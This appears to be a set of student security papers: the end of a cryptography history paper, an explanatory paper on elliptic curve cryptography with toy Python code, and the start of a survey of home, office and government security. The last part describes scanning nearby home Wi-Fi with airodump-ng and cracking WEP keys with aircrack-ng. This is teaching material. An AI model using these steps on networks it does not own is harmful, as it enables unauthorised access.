5. There should be only one copy of the key each for the sender and the recipient.

Figures

Fig 1. Vigenere Table
Fig 2. Playfair cipher key table
Fig 3. ADFGVX cipher key
Fig 4. ADFGVX cipher-text
Fig 5. ADFGVX resultant cipher-text
Fig 6. DES block diagram
Fig 7. Summary of AES Encryption

Formulas
(1) X = (P-1)(Q-1)
(2) N = P*Q
(3) C = m^E mod N
(4) D*E mod X = 1
(5) m = C^D mod N
(6) C^D mod N = m^(E*D) mod N

Appendix B References
1. Student Pulse, http://www.studentpulse.com/articles/41/a-brief-history-of-cryptography
2. Gary Kessler Associates, http://www.garykessler.net/library/crypto.html
3. Cornell Mathematics, http://www.math.cornell.edu/~kozdron/Teaching/Cornell/135Summer06/Handouts/Lecture2.pdf
4. Oracle Thinkquest: Library, http://library.thinkquest.org/28005/flashed/timemachine/courseofhistory/jefferson.shtml
5. Crypto Museum, http://www.cryptomuseum.com/crypto/usa/jefferson/index.htm#ref
6. Discovering Lewis & Clark, http://lewis-clark.org/content/content-article.asp?ArticleID=2224
7. Rumkin.com, http://rumkin.com/tools/cipher/playfair.php
8. Practical Cryptography, http://practicalcryptography.com/ciphers/playfair-cipher/
9. Practical Cryptography, http://practicalcryptography.com/ciphers/adfgvx-cipher/
10. RuffNekk's Crypto Pages, http://ruffnekk.stormloader.com/adfgvx_info.html
11. University of Cambridge, http://www.srcf.ucam.org/~bgr25/cipher/adfgvx.php
12. Marcus J. Ranum, http://www.ranum.com/security/computer_security/papers/otp-faq/
13. Universiteit van Amsterdam, http://www.maurits.vdschee.nl/otp/
14. Books by William Stallings, http://williamstallings.com/Extras/SecurityNotes/lectures/blockA.html
15. University of Wisconsin Madison, http://pages.cs.wisc.edu/~rist/papers/detenc-rel.pdf
16. Applied Crypto Group, http://crypto.stanford.edu/~dabo/pubs/papers/RSA-survey.pdf
17. RSA Encryption – Tom Davis, http://www.geometer.org/mathcircles/RSA.pdf
18. RSA Public-Key Cryptography, http://www.efgh.com/software/rsa.htm
19. Schneier on Security, http://www.schneier.com/blog/archives/2009/07/new_attack_on_a.html

Elliptic Curve Cryptography
Guan Xiao Kang, Chong Wei Zhi, Cheong Pui Kun Joan
National University of Singapore (NUS), School of Computing, CS3235: Computer Security

Abstract. This paper gives an overview of Elliptic Curve Cryptography (ECC) and how it is used to implement digital signatures using the Elliptic Curve Digital Signature Algorithm (ECDSA) and key agreement protocols using Elliptic Curve Diffie-Hellman (ECDH). The mathematical components of an elliptic curve function and the underlying theory of ECC are discussed. The paper also gives a general description of the security issues of ECC, as well as some ECC implementation examples.

1 Introduction

Elliptic Curve Cryptography (ECC) is a public key cryptography method based on elliptic curves over a finite field. There are two main uses of public key cryptography: public key encryption and digital signatures. Public key encryption involves sending a message encrypted with the recipient's public key, which can only be decrypted with the recipient's private key; this provides confidentiality. A digital signature, on the other hand, is used to prove the authenticity of the sender: a message encrypted with the sender's private key is sent to the recipient, who decrypts it with the sender's matching public key to confirm that the sender had access to the associated private key. Such public key cryptography is assumed to be secure due to the difficulty of factorizing a large integer made up of two large prime factors; the larger the key length, the more secure it is. ECC is able to provide a similar level and type of security with much smaller key lengths, due to the difficulty of the elliptic curve discrete logarithm problem: finding k such that Q = kP, where P and Q are points on an elliptic curve E defined over a finite field. Hence, with shorter key lengths, the handshaking protocols used between sender and recipient where public key cryptography is implemented become faster.
2 Mathematical Knowledge for ECC

2.1 Elliptic Curve Function

An elliptic curve E over a field F can be described by the equation y^2 = x^3 + ax + b, where a, b are elements of F. Elliptic curve cryptography is defined over such a curve subject to the condition that the discriminant quantity 4a^3 + 27b^2 is not equal to 0. This condition must be satisfied so that the elliptic curve possesses 3 distinct roots; if 4a^3 + 27b^2 = 0, two or more roots coalesce, producing curves that are singular. Singular curves are not desirable for cryptography because they are easy to crack. Another characteristic of the elliptic curve is that it is symmetric about the x-axis, which can be observed by rewriting the equation as y = ±sqrt(x^3 + ax + b). Each pair of values a and b gives a different elliptic curve, and the curve consists of all points (x, y) satisfying the equation, together with a point at infinity. For instance, in an implementation of ECC for public key cryptography, the public key is a point on the curve and the private key is a randomly generated number; the public key is obtained by multiplying the private key with a generator point G on the curve. This generator G, the values a and b within the field F, and other constants form the domain parameters of ECC, which are elaborated further under "Elliptic Curve Domain Parameters for different finite fields" later in this paper.

2.2 Point Addition

Before covering point multiplication, which is necessary for generating the keys, we describe point addition, since it is a building block of point multiplication. Point addition is the adding of 2 points J and K on an elliptic curve to obtain another point L on the same elliptic curve.

Fig. 1. The graph demonstrates a line intersecting J, K and -L if J ≠ K, for point addition.

The elliptic curve has 2 relevant properties. The first is that a (non-vertical) line intersecting the curve at 2 points intersects it at a 3rd point. Fig. 1 shows that if J ≠ K and a line is drawn through both points J and K, it intersects the point -L on the same elliptic curve. Reflecting -L about the x-axis then gives L, so that L = J + K on the elliptic curve.

Fig. 2. The graph demonstrates a line intersecting J, K and ∞ if J = -K, i.e. when the line is vertical.

If J = -K, the line through both J and K also meets the curve at the point at infinity ∞, since all vertical lines intersect the curve at ∞ (the curve's slope keeps increasing after the inflection point, eventually becoming infinite). Therefore J + (-J) = ∞, and this point, written O, is the identity for point addition, the additive identity of the elliptic curve group, as shown in Fig. 2.

To find the point L, we first find the line through J, K and -L. Let J = (xJ, yJ), K = (xK, yK) and L = (xL, yL), and let the slope of the line be s, where s = (yJ - yK) / (xJ - xK). Then xL and yL are given by:
1. xL = s^2 - xJ - xK
2. yL = -yJ + s(xJ - xL)
However, if J = -K, i.e. K = (xJ, -yJ), then J + K = O, where O is the point at infinity. The second property is that a line tangent to the elliptic curve intersects the curve at one other point; this is elaborated in the next section.
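The slope formulas above translate directly into code. The following Python sketch adds two distinct points on a toy curve y^2 = x^3 + 2x + 2 over GF(17); the curve and points are illustrative choices of our own, and the special cases J = K and J = -K are handled in the doubling sketch later.

    # Toy curve y^2 = x^3 + 2x + 2 over GF(17).
    p, a, b = 17, 2, 2

    def point_add(J, K):
        # Assumes J != K and J != -K; the division in the slope formula
        # becomes a modular inverse (Python 3.8+).
        (xj, yj), (xk, yk) = J, K
        s = (yj - yk) * pow(xj - xk, -1, p) % p
        xl = (s * s - xj - xk) % p
        yl = (-yj + s * (xj - xl)) % p
        return (xl, yl)

    print(point_add((5, 1), (6, 3)))   # prints (10, 6)

Both (5, 1) and (6, 3) satisfy the curve equation modulo 17, and so does their sum (10, 6).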
2.3 Point Doubling on real numbers, Prime field, Binary field and in the Projective Coordinate System

Fig. 3. The graph demonstrates a line tangent at the point J and intersecting -L if J = K, for point doubling.

The second property is that a line tangent to the elliptic curve intersects the curve at another point. Fig. 3 shows that if J = K and a line is drawn tangent to the curve at J, it intersects the point -L on the same elliptic curve. Similarly, reflecting -L about the x-axis gives L, so that L = 2J on the elliptic curve.

Fig. 4. The graph demonstrates a vertical tangent at the point J, meeting the curve at ∞, when yJ = 0.

However, if the y-coordinate of the point J is zero, the tangent at J is vertical and meets the curve at ∞, so 2J = ∞ in that case. To find the point L, we first find the line tangent at J and intersecting -L. Let J = (xJ, yJ) and L = (xL, yL), let s be the slope of the tangent at J, and let a be one of the parameters chosen with the elliptic curve. The tangent slope is s = (3xJ^2 + a) / (2yJ), and xL and yL are given by:
1. xL = s^2 - 2xJ
2. yL = -yJ + s(xJ - xL)

Both point addition and point doubling are necessary operations for point multiplication. Although the graph of an elliptic curve over a Prime field is not a smooth curve, the rules for point doubling can still be adapted. As the elements of the Prime field are the integers between 0 and P - 1, the equation of the elliptic curve over a prime field is y^2 mod P = (x^3 + ax + b) mod P, where (4a^3 + 27b^2) mod P ≠ 0. In elliptic curve cryptography, the prime number P is chosen in such a way that there are many points on the elliptic curve, in order to make the encryption stronger. Adapting the doubling rules to the prime field gives:
1. s = (3xJ^2 + a) / (2yJ) mod P
2. xL = (s^2 - 2xJ) mod P
3. yL = (-yJ + s(xJ - xL)) mod P

Similarly for the Binary field: despite having a different equation and elements, the rules for point doubling can be adapted. The equation of the elliptic curve over a Binary field is y^2 + xy = x^3 + ax^2 + b, where b ≠ 0, and the doubling equations become:
1. s = xJ + (yJ / xJ)
2. xL = s^2 + s + a
3. yL = xJ^2 + xL(s + 1)

In the projective coordinate system, the multiplicative inverse operation in point addition and doubling can be eliminated. This improves the efficiency of point multiplication: a given point is converted from affine to projective coordinates before point multiplication and converted back afterwards, so that only one multiplicative inverse operation is needed in total. Operations in projective coordinates involve more scalar multiplications than in affine coordinates, however, so ECC in projective coordinates is only more efficient when the multiplicative inverse operation is slower than the additional multiplications. Despite the different curve equation and the use of points (X, Y, Z), the point doubling formula L = 2J carries over to projective coordinates.
As a note, the point (X, Y, Z) in projective coordinates corresponds to the point (X/Z, Y/Z^2) in affine coordinates. The equation of the elliptic curve in projective coordinates is Y^2 + XYZ = X^3 Z + aX^2 Z^2 + bZ^4. Letting (X3, Y3, Z3) = 2(X1, Y1, Z1), point doubling is computed as:
1. Z3 = X1^2 * Z1^2
2. X3 = X1^4 + b*Z1^4
3. Y3 = b*Z1^4*Z3 + X3*(a*Z3 + Y1^2 + b*Z1^4)

2.4 Point Multiplication

The main cryptographic operation in ECC is point multiplication, which computes Q = kP as mentioned earlier: the point P on the elliptic curve is multiplied by an integer k, resulting in another point Q on the same curve. Point multiplication can be done by a combination of the two basic elliptic curve operations explained in the earlier sections: point addition and point doubling. Performing a point multiplication requires on the order of log2(k) doubling and addition operations. For example, if k = 11, then 11P = 2(2(2P) + P) + P; if k = 23, then 23P = 2(2(2(2P) + P) + P) + P. This is the simplest method of performing point multiplication; other methods for computing point multiplication include the windowed method, the sliding window method and the wNAF method.
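A sketch of this double-and-add method follows, combining the addition and doubling formulas of Sections 2.2 and 2.3 over the same toy curve as before; None plays the role of the point at infinity O.

    p, a, b = 17, 2, 2   # toy curve y^2 = x^3 + 2x + 2 over GF(17)

    def add(J, K):
        # General point addition, covering O, doubling and inverse cases.
        if J is None: return K
        if K is None: return J
        (xj, yj), (xk, yk) = J, K
        if xj == xk and (yj + yk) % p == 0:
            return None                                      # J + (-J) = O
        if J == K:
            s = (3 * xj * xj + a) * pow(2 * yj, -1, p) % p   # tangent slope
        else:
            s = (yj - yk) * pow(xj - xk, -1, p) % p          # chord slope
        xl = (s * s - xj - xk) % p
        yl = (-yj + s * (xj - xl)) % p
        return (xl, yl)

    def multiply(k, P):
        # Double-and-add: scans the bits of k, so about log2(k) operations.
        Q = None
        while k:
            if k & 1:
                Q = add(Q, P)
            P = add(P, P)
            k >>= 1
        return Q

    G = (5, 1)
    assert multiply(11, G) == add(multiply(8, G), add(multiply(2, G), G))

Because the loop scans the bits of k, computing kP stays feasible even for the very large scalars used as private keys, which is exactly the log2(k) cost noted above.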
3 Underlying Theory of ECC

3.1 Public key and private key

Assume P and Q are 2 points on an elliptic curve such that Q = kP, where k is a scalar. If only P and Q are given, it is very hard to compute k, which is not only the discrete logarithm of Q to the base P but also serves as the private key, selected randomly by the user. To generate both keys, the user selects a random integer k as the private key and computes kP, which serves as the corresponding public key.

3.2 Discrete Logarithm Problem

The discrete logarithm problem is the problem of finding x in the equation g^x = h, given that the elements g and h belong to a finite cyclic group G; equivalently, it is the problem of computing x = log_g h from g and h. It is similar to the factoring problem in that when the group becomes very big, the computation becomes very slow, leading to the belief that the discrete logarithm problem is very difficult. ECC is one of the cryptographic systems that rely on the difficulty of the discrete logarithm problem; other such systems include Diffie-Hellman key agreement and the Digital Signature Algorithm.

3.3 Elliptic Curve Domain Parameters for different finite fields

In order to use ECC, all parties involved in secure, trusted communication using ECC must agree on the elements and parameters, called domain parameters, that define the elliptic curve. Apart from the parameters a and b, other domain parameters for the Prime field and the Binary field must also be agreed; they are described below. The generation of domain parameters is not done by the parties involved, since it involves counting the number of points on the elliptic curve, which takes much time and effort; instead, several standards bodies such as NIST and SECG publish domain parameters of elliptic curves for common field sizes.

3.3.1 Domain parameters for Elliptic Curve over Prime field

For the elliptic curve over a prime field, the domain parameters are p, G, n and h, as well as the parameters a and b defined in the elliptic curve function y^2 mod p = (x^3 + ax + b) mod p.
p is the prime number defined for the prime field.
G is the generator point, with coordinates (xG, yG), a point on the elliptic curve chosen for the cryptosystem.
n is the order of the elliptic curve.
h = (number of points on the elliptic curve)/n is the cofactor.
The scalar for point multiplication is chosen as a number between 0 and n-1.

3.3.2 Domain parameters for Elliptic Curve over Binary field

For the elliptic curve over a binary field, the domain parameters are m and f(x), as well as the domain parameters G, n, h, a and b defined for the elliptic curve over the prime field above.
m is an integer defined for the binary field, such that the elements of the binary field are at most m bits long.
f(x) is an irreducible polynomial of degree m.
The scalar for point multiplication is chosen as a number between 0 and n-1.

4 Advantage over current schemes / Motivation

4.1 Small key size

Comparing Integer Factorization (RSA) against the Elliptic Curve Discrete Logarithm (ECDSA), the attacker faces a different mathematical problem in each case, with different methods of solving it. The mathematical problem of Integer Factorization is to find the prime factors of a number n, whereas the problem of the Elliptic Curve Discrete Logarithm is to find k in the equation Q = kP, with points Q and P on an elliptic curve. The most efficient and fastest known method to solve Integer Factorization is the Number Field Sieve, with running time exp[1.923(log n)^(1/3) (log log n)^(2/3)] (sub-exponential), while the most efficient and fastest known way to solve the Elliptic Curve Discrete Logarithm is the Pollard-Rho algorithm, with running time sqrt(n) (fully exponential). Since the Pollard-Rho algorithm runs more slowly than the Number Field Sieve, ECC can offer the same security as Integer Factorization with smaller keys. This allows a 160-bit ECC key to operate at an equal security level to a 1024-bit RSA key. The smaller key size allows for faster computations, lower bandwidth and memory usage, and lower power consumption. So not only do small embedded devices benefit from using ECC; web servers can also lower computation and resource usage by using it.

5 Practical use of ECC

5.1 ECDSA - Elliptic Curve Digital Signature Algorithm and explanation

5.1.1 Digital Signature and DSA

A digital signature algorithm is used to ensure the authenticity of a message sent from the sender to the receiver. For instance, let Alice and Bob be the two parties involved in the transmission. Alice and Bob each have their own public and private keys, as well as each other's public keys. If Alice sends a message to Bob encrypted using Bob's public key, only Bob will be able to decrypt the message, using his private key, which is known only to him. Bob then digitally signs his reply to Alice by hashing the reply to create a message digest; the message digest ensures that any change made to the signed message will not go undetected. Bob then encrypts the message digest with his private key to create his digital signature. DSA has three phases: key generation, signature generation and signature verification.

DSA Key Generation
The key generation algorithm selects a random integer x where 0 < x < q. The private key is x and the public key is y = g^x mod p, within the domain parameters (p, q, g).

DSA Signature Generation
Let H be the hashing function (e.g. SHA-1) and m the message:
1) Select a random integer k where 0 < k < q
2) Compute r = (g^k mod p) mod q
3) Calculate s = [k^-1 (H(m) + x*r)] mod q
The digital signature (e.g. Bob's) will be (r, s).
Bob can now append his digital signature to the message he wants to send back to Alice.

DSA Signature Verification
To verify Bob's signature (r, s) on m, Alice obtains authentic copies of Bob's domain parameters (p, q, g) and public key y, and does the following:
1) Reject the signature if 0 < r < q or 0 < s < q is not satisfied
2) Calculate w = s^-1 mod q
3) Calculate u1 = H(m)*w mod q
4) Calculate u2 = r*w mod q
5) Calculate v = ((g^u1 * y^u2) mod p) mod q
Alice is able to verify the digital signature because Bob's public key is known. The signature is valid if v = r.

5.1.2 Elliptic Curve Digital Signature and ECDSA

The Elliptic Curve Digital Signature Algorithm (ECDSA) is a variant of the above-mentioned DSA using elliptic curve cryptography. Essentially, ECDSA can be viewed as the elliptic curve version of the older discrete logarithm cryptosystems, whereby the prime-order group of non-negative integers is replaced by the group of points on an elliptic curve over a finite field. The bit size of an ECDSA public key is about twice the security level in bits, much smaller than for DSA: an ECDSA public key needs only 160 bits to provide the same security level as a DSA public key of at least 1024 bits. In addition, DSA and ECDSA signatures are the same size at the same security level. Like DSA, ECDSA has three phases: key generation, signature generation and signature verification.

ECDSA Key Generation
Assume Alice wants to send a message m to Bob. Each has a pair of keys associated with a particular set of EC domain parameters, D = (q, FR, a, b, G, n, h). There is an elliptic curve E defined over Fq, with q prime, and P is a point of prime order n on the elliptic curve (e.g. in E(Fq)). To generate their keys, Alice and Bob each:
1) Select a random integer d where 0 < d < n
2) Compute Q = d*P (scalar multiplication)
3) Take Q as the public key and d as the private key.

ECDSA Signature Generation
Now that both Alice and Bob have a key pair suitable for elliptic curve cryptography, private key d and public key Q within domain parameters D = (q, FR, a, b, G, n, h), each of them can create a signature by doing the following:
1) Select a random integer k, where 0 < k < n
2) Compute kP = (x1, y1) and r = x1 mod n, where x1 is an integer between 0 and q-1
3) Compute k^-1 mod n
4) Compute s = [k^-1 (H(m) + d*r)] mod n
Alice's signature for message m is the pair of integers (r, s).

ECDSA Signature Verification
In order for Bob to verify Alice's signature (r, s) appended to the message m, Bob obtains an authentic copy of Alice's domain parameters D = (q, FR, a, b, G, n, h) and public key Q, and does the following:
1) Reject the signature if 0 < r < n or 0 < s < n is not satisfied
2) Compute w = s^-1 mod n, and H(m)
3) Compute u1 = H(m)*w mod n
4) Compute u2 = r*w mod n
5) Compute u1*P + u2*Q = (x0, y0) and v = x0 mod n
Bob can accept the signature if v = r, verifying that the message was sent by Alice.
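In practice one would use a vetted library rather than hand-rolled curve arithmetic. Purely as an illustration (the third-party python-ecdsa package, installable with pip install ecdsa, is our assumed example and is not mentioned in the paper), the three phases above reduce to a few calls:

    from ecdsa import SigningKey, NIST192p

    sk = SigningKey.generate(curve=NIST192p)   # private key d
    vk = sk.get_verifying_key()                # public key Q = d*G
    signature = sk.sign(b"message from Alice")
    assert vk.verify(signature, b"message from Alice")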
5.2 ECDH - Elliptic Curve Diffie-Hellman and explanation

5.2.1 Diffie-Hellman Key Agreement

Diffie-Hellman (DH) is a key agreement protocol whereby two entities with no prior knowledge of each other create a shared secret key together over an insecure communication channel. This shared secret key can then be used to encrypt subsequent communications. For Alice and Bob to create a shared secret key, both parties first need to exchange a prime P and a generator G, where P > G and G is a primitive root of P. To share a secret key, Alice and Bob then do the following:
1) Generate random numbers XA (Alice's private key) and XB (Bob's private key)
2) Alice computes YA = G^XA mod P and sends it to Bob
3) Bob computes YB = G^XB mod P and sends it to Alice
4) Alice now computes the secret key = YB^XA mod P
5) Bob now computes the secret key = YA^XB mod P
Both arrive at the same value, G^(XA*XB) mod P.

5.2.2 Elliptic Curve Diffie-Hellman, ECDH

Elliptic Curve Diffie-Hellman is a variant of the Diffie-Hellman key agreement protocol which likewise allows two entities to establish a shared secret key. Similarly, any third party who does not have access to the private keys of both entities will not be able to calculate the shared secret key, even if he/she snoops on the conversation. Generating the shared secret key between the two entities using ECDH requires agreement on elliptic curve domain parameters (defined in "Elliptic Curve Domain Parameters for different finite fields"). Each entity has a pair of keys consisting of a private key d, a randomly generated integer less than n, where n is the order of the curve, and a public key Q = d*G, where G is the generator point within the elliptic curve domain parameters. For instance, Alice has her private and public key pair (dA, QA) and Bob has (dB, QB). To generate the shared secret key, both do the following:
1) Alice computes K = (xK, yK) = dA*QB
2) Bob computes L = (xL, yL) = dB*QA
3) Since dA*QB = dA*dB*G = dB*dA*G = dB*QA, we have K = L and xK = xL
Hence, the shared secret key between Alice and Bob is xK (or xL). As mentioned, a third party will not be able to obtain the shared secret key, as it is practically impossible to find the private keys dA or dB from the public keys QA and QB.
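The classic exchange of Section 5.2.1 is easy to verify with toy numbers in Python; ECDH follows the same pattern with modular exponentiation replaced by point multiplication. The parameters P = 23, G = 5 and the private keys below are illustrative values of our own (real deployments use primes of 2048 bits or more).

    P, G = 23, 5                 # public prime and generator

    xa, xb = 6, 15               # Alice's and Bob's private keys
    ya = pow(G, xa, P)           # Alice sends Y_A = G^X_A mod P
    yb = pow(G, xb, P)           # Bob sends   Y_B = G^X_B mod P

    k_alice = pow(yb, xa, P)     # Alice computes (G^X_B)^X_A mod P
    k_bob   = pow(ya, xb, P)     # Bob computes   (G^X_A)^X_B mod P
    assert k_alice == k_bob      # both arrive at the same shared secret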
6 Possible attacks

In elliptic curve cryptography, computation of the scalar multiplication Q = d*P of the point P with the secret scalar d is a critical step; hence many attacks aim to discover the value d, which is the private key.

6.1 Side-channel attacks

A side-channel attack is an attack based on information gathered from the physical implementation of a cryptosystem, as distinct from brute force attacks or cryptanalysis. Timing information (the amount of time various computations take to perform), the power consumption of the hardware, electromagnetic radiation leaks (which can reveal plaintexts and other information) and even the sound produced during computation can all provide extra sources of information that can be used to reveal secret keys and attack the cryptosystem. There is an increasing trend of ECC implementations on smart cards and other portable devices (where the secret key is stored inside the smart card, which is seen as a tamper-proof device since it is considered impossible to obtain the secret key directly without destroying the information), and this makes ECC vulnerable to side-channel attacks. In a simple side-channel attack, the attacker tries to derive the secret key directly from the samples obtained. The attacker needs in-depth knowledge of the implementation of the ECC algorithm he/she is attacking to break the system successfully; in addition, the attacker must be able to monitor the side-channel leakage of the device, and the secret key to be revealed must have a significant impact on that leakage. In implementations of ECDSA's scalar multiplication Q = d*P, the side-channel attack exploits the differing patterns between the side-channel features of the addition operations and the doubling operations on the point P on the elliptic curve.

Hence, a secure method of preventing side-channel attacks is to remove the dependence between the different side-channel patterns of the addition and doubling operations. One way to remove the key-dependent patterns is to make the processing of the "1" and "0" bits of the multiplier d indistinguishable. This makes the addition and doubling operations indistinguishable, dividing each process into blocks by inserting dummy operations so as to present a uniform repetition of instruction blocks that the attacker cannot tell apart.

6.2 Fault attacks

While side-channel attacks are passive attacks, in which the attacker listens to some side channel for leakage without interfering with the computation, fault attacks (also known as fault analysis attacks) are active attacks: the attacker has access to the target device and tampers with it in order to create faults, or exploits faults that occur due to hardware failure or bugs while the device is performing a private key operation. The attacker takes advantage of the faults caused by his malicious activity or by hardware failure, collecting the incorrect data produced, together with side-channel information such as timing and power consumption, emitted while the device computes with the private key.

7 Implementation

We realize that a considerable amount of mathematical knowledge is involved in Elliptic Curve Cryptography, which might make it harder for people to understand how the technique works. In order to present this topic more intuitively and make the theory easier to digest, we have developed a set of "Teaching ECC" web pages. These web pages graphically detail the key elliptic curve point operations and the elliptic curve discrete logarithm problem involved. We also show how the underlying elliptic curve cryptography operations work through an example of practical use, the Elliptic Curve Digital Signature Algorithm (ECDSA). The web pages are hosted at http://xiaokangz.comp.nus.edu.sg/CS3235/ECC .

Introduction Page: This page briefly introduces elliptic curves and the general idea of Elliptic Curve Cryptography. Key advantages of the technique are listed to show the motivation for using such a scheme for computer security, and readers will gain a basic understanding of the underlying theory of this cryptography.

Elliptic Curve Point Operations Page: This page provides the necessary mathematical knowledge used in Elliptic Curve Cryptography. We show the group law of the elliptic curve using graphs, and, to give readers an intuitive idea of how point operations are done, an interactive step-by-step demonstration of point doubling and point addition is shown. Simply go through every step of the operations by clicking the mouse, and each step will be shown clearly on the graph.

Elliptic Curve Discrete Logarithm Page: The high security of Elliptic Curve Cryptography relies on the difficulty of the elliptic curve discrete logarithm problem. This page introduces and explains the problem using a simple example. To show how secure Elliptic Curve Cryptography is, we compare its key size with those of other cryptography schemes.

Elliptic Curve Digital Signature Algorithm Page: We take a real example of Elliptic Curve Cryptography, the Elliptic Curve Digital Signature Algorithm (ECDSA), for demonstration. This page clearly shows all the steps involved in both signature generation and signature verification.
We have built a simple underlying engine for the Elliptic Curve Digital Signature Algorithm, which can simulate the whole flow using small numbers. Thus readers can have the experience of walking through the generation and verification of a digital signature.

8 References
1. Elliptic curve cryptography, Wikipedia, the free encyclopaedia, http://en.wikipedia.org/wiki/Elliptic_curve_cryptography
2. Discrete logarithm records, Wikipedia, the free encyclopaedia, http://en.wikipedia.org/wiki/Discrete_logarithm_records#Elliptic_curves
3. Public key cryptography, Wikipedia, the free encyclopaedia, http://en.wikipedia.org/wiki/Public-key_cryptography
4. Diffie-Hellman key exchange, Wikipedia, the free encyclopaedia, http://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange
5. Elliptic curve Diffie-Hellman, Wikipedia, the free encyclopaedia, http://en.wikipedia.org/wiki/Elliptic_curve_Diffie%E2%80%93Hellman
6. Digital Signature Algorithm, Wikipedia, the free encyclopaedia, http://en.wikipedia.org/wiki/Digital_Signature_Algorithm
7. Elliptic curve DSA, Wikipedia, the free encyclopaedia, http://en.wikipedia.org/wiki/Elliptic_Curve_DSA
8. Avinash Kak: Lecture 14: Elliptic Curve Cryptography and Digital Rights Management, https://engineering.purdue.edu/kak/compsec/NewLectures/Lecture14.pdf
9. Anoop MS: Elliptic Curve Cryptography, http://www.reverseengineering.info/Cryptography/AN1.5.07.pdf
10. RSA Laboratories, http://www.rsa.com/rsalabs/node.asp?id=2165
11. Youdzone: What is a Digital Signature, http://www.youdzone.com/signature.html
12. Aqueel Khalique, Kuldip Singh, Sandeep Sood: Implementation of Elliptic Curve Digital Signature Algorithm, http://www.ijcaonline.org/volume2/number2/pxc387876.pdf
13. Wu Keke, Li Huiyun, Zhu Dingju, Yu Fengqi: Efficient Solution to Secure ECC Against Side-Channel Attacks, http://www.ejournal.org.cn/english/qikan/manage/wenzhang/EN20110316.pdf
14. Anja Becker: Methods of Fault Analysis Attacks on Elliptic Curve Cryptosystems: Comparison and Combination of Countermeasures to resist SCA (2006)
15. Sheueling Chang, Hans Eberle, Vipul Gupta, Nils Gura, Sun Microsystems Laboratories: Elliptic Curve Cryptography – How it Works, http://labs.oracle.com/projects/crypto/HowECCWorks-USLetter.pdf

Security Requirement in Different Environments
Ru Ting Liu, Jun Jie Neo, Kar Yaan Kelvin Yip, Junjie Yang
National University of Singapore, 21 Lower Kent Ridge Road, Singapore 119077

Abstract. The rationale for conducting this research is to explore the different security measures and policies adopted in environments such as the home, the office and the government. For the office and military environments, we visited several companies in Singapore, such as DSO and English Corner, for a field study to understand how these companies protect their data and information; the observations gathered are used to determine the security level of the various environments. However, we note a limitation of the research into the government environment, as details and policies are mostly not disclosed, so only limited information could be gathered via Internet research and the field study. For the home environment, a practical approach to detecting network vulnerabilities was taken, in which open source software running on the Linux operating system was used to crack wireless network security. Moreover, an online survey was conducted to gather more information about how individuals secure their wireless networks in the home environment.
1 Introduction

Security issues and policies have been a recurring topic in news articles and are a growing concern for all types of organizations, from the individual home environment to large bodies such as government. These different environments may be required to deploy different standards of security policy. This document therefore aims to look at the different security-related measures taken by entities in different environments, specifically the Home, Government and Enterprise environments. By examining physical measures, computer security policies and wireless network security, this paper tries to get a sense of how knowledgeable these entities are and how far they are willing to go in protecting themselves from information theft. The paper aims to highlight the different aspects of each environment, thereby suggesting ways in which improvements should be made appropriate to that environment.

2 Security in Home environment

2.1 Types of device (Router, Modem) and Wireless Security used

The security deployed in the home environment varies between individuals and often depends on the type of Internet service they subscribe to. In Singapore there are 4 available network providers, namely SingNet, Starhub, Pacnet and M1, but because most Singaporeans subscribe to either SingNet or Starhub, as evidenced by our survey (Figure 33), which shows that 71% of individuals use SingNet and 24% use Starhub, only these two providers are discussed. Individuals who subscribe to SingNet are provided with a modem (2WIRE) that comes pre-configured with default security settings. The older default configuration of this modem uses WEP encryption for wireless (supported by the collected survey results in Figures 16 to 32: individuals who subscribed to SingNet more than a year ago use WEP encryption for their wireless network), and no password is required to access the device's administration interface. Although the newer device has improved wireless security, using WPA-PSK MIXED, there is still no default password required to access the administration interface. On the other hand, the security of the Starhub device can be considerably weaker: the default setting of the device (Linksys) has no wireless protection at all, and anyone can connect to it. Individuals are required to set up their own security if they use Starhub. There are other routers sold on the market that individuals can use to replace or add on to these existing routers, which ought to deploy better security than the providers' devices, but individuals are seldom willing to spend extra money on a router when the existing one suffices for surfing the Internet. The following sections discuss the vulnerability of wireless networks in the home environment, based on real practical tests deployed in range of a number of home networks.

2.2 Wireless security deployed in home environment (Research)

There are pre-requisites before our practical test can be deployed in the home network environment. In our test, we use a USB D-Link network device as the base station to detect nearby wireless signals. We use Ubuntu 11.10 as the operating system, as it runs network-monitoring tools more efficiently than Windows. Various tools are used, such as aircrack-ng, tcpdump, etc. To look up nearby wireless networks, the 'airodump-ng' monitoring tool from the aircrack-ng suite is used.
Figures 1 and 2 show all the nearby available wireless networks when the command "airodump-ng mon0" is entered, where mon0 is the wireless interface used. These two figures were captured in different locations, and we can see that most wireless networks use WEP to secure the network; some networks are secured using WPA/WPA2, but some are not secured at all. There are many reasons why WEP is still being used to secure wireless networks in the home environment. The most basic and common reason is that individuals have no prior IT knowledge: to them, being able to connect to the Internet with a simple protection that deters other unauthorized users is sufficient. They have no knowledge of what WEP, WPA and WPA2 are, often just use the default protection provided by the Internet provider, and some do not protect their wireless at all. The second reason may lie with the ISPs and vendors who supply the modems and routers. Older devices, from 3 to 4 years ago, use WEP as the default protection, and the ISPs' efforts in offering WEP were aimed at preventing the sharing of Internet connections rather than at individuals' security. Although the default protection on newer devices is WPA/WPA2, many individuals have not changed over and are still using the older devices. WPA/WPA2 is used because of the weaknesses in WEP, and also because the larger coverage area supported by IEEE 802.11n leaves a network exposed to attacks from further away. WEP encryption is vulnerable to attack, and there are readily available tools that take advantage of weaknesses in the WEP key algorithm to attack a network successfully and discover the WEP key [1]. To crack a WEP network, sophisticated hardware or software tools are not required; a Wi-Fi-enabled laptop and open-source network tools are sufficient. In the next section, we show how easily WEP can be cracked as compared to WPA and WPA2.

2.3 Vulnerability (Research)

2.3.1 WEP

A number of flaws were discovered in the WEP algorithm; in particular, there are passive attacks that decrypt traffic, active attacks that inject new traffic, active attacks that decrypt traffic, and dictionary-building attacks that allow real-time automated decryption of all traffic. [2] In this study, we use aircrack-ng [3] to recover WEP keys. Aircrack-ng exploits the unique initialization vector (IV) inside each packet, and a large number of data packets is required to crack the WEP key. With a large number of packets captured, the key can be found by running the standard FMS, KoreK and PTW attacks on the captured data packets.

